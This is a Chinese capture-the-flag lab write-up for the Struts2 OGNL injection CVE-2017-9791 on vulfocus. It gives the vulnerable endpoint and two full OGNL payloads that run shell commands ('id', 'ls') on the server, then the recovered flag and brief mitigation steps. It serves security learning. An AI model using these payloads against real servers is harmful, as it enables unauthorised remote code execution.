• vulfocus——struts2-cve_2017_9791


    描述

    Struts2是一个基于MVC设计模式Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。本质问题出在struts2-struts1-plugin包Struts1Action.java文件中,Struts1Action类中的execute方法调用了getText函数,这个函数会执行ognl表达式,更为严重的是getText的输入内容是攻击者可控的。

    复现

    1.打开靶场环境

    2.访问存在漏洞的路径 /integration/saveGangster.action 

    3.输入表达式${1+2},提交后,发现运算在后台被执行(下面两个框随便填写)

     

    4. 大佬构建的命令执行pyload,执行命令为id

    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

     

    5.把id换成pwd,查看当前目录,发现当前目录是tmp

     

    6. 再换成命令ls,然后报错了,在里面看到一串字符,想试试看,是不是flag,结果真的对了

     

    7.将payload进行url转换,抓包然后替换,再发送,就得到flag了

    大佬构造的payload:

    %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

    flag-{bmh8d5b403a-e292-48e8-875a-6a76e45e3792}

    8.我们还可以使用工具来获取flag

     

    漏洞防护:1)停用Struts2-struts1-plugin插件、showcase.war;2)将直接传递原始值改为使用资源键

  • 相关阅读:
    模式识别 1.距离分类器
    Maven - 国内 Maven 镜像仓库(加速包,冲冲冲~)
    如何让你的程序支持lua脚本
    MongoDB入门与实战-第三章-数据操作增删改查索引
    英语小作文写作模板及步骤(1)
    NFT 推荐|史蒂夫·青木 NFT 作品集
    C++提高编程
    Vue项目打包部署到Gitee Pages配置教程(无空白bug)
    8.strtok函数
    Windows环境部署Hadoop-3.3.2和Spark3.3.2
  • 原文地址:https://blog.csdn.net/m0_62063669/article/details/126708970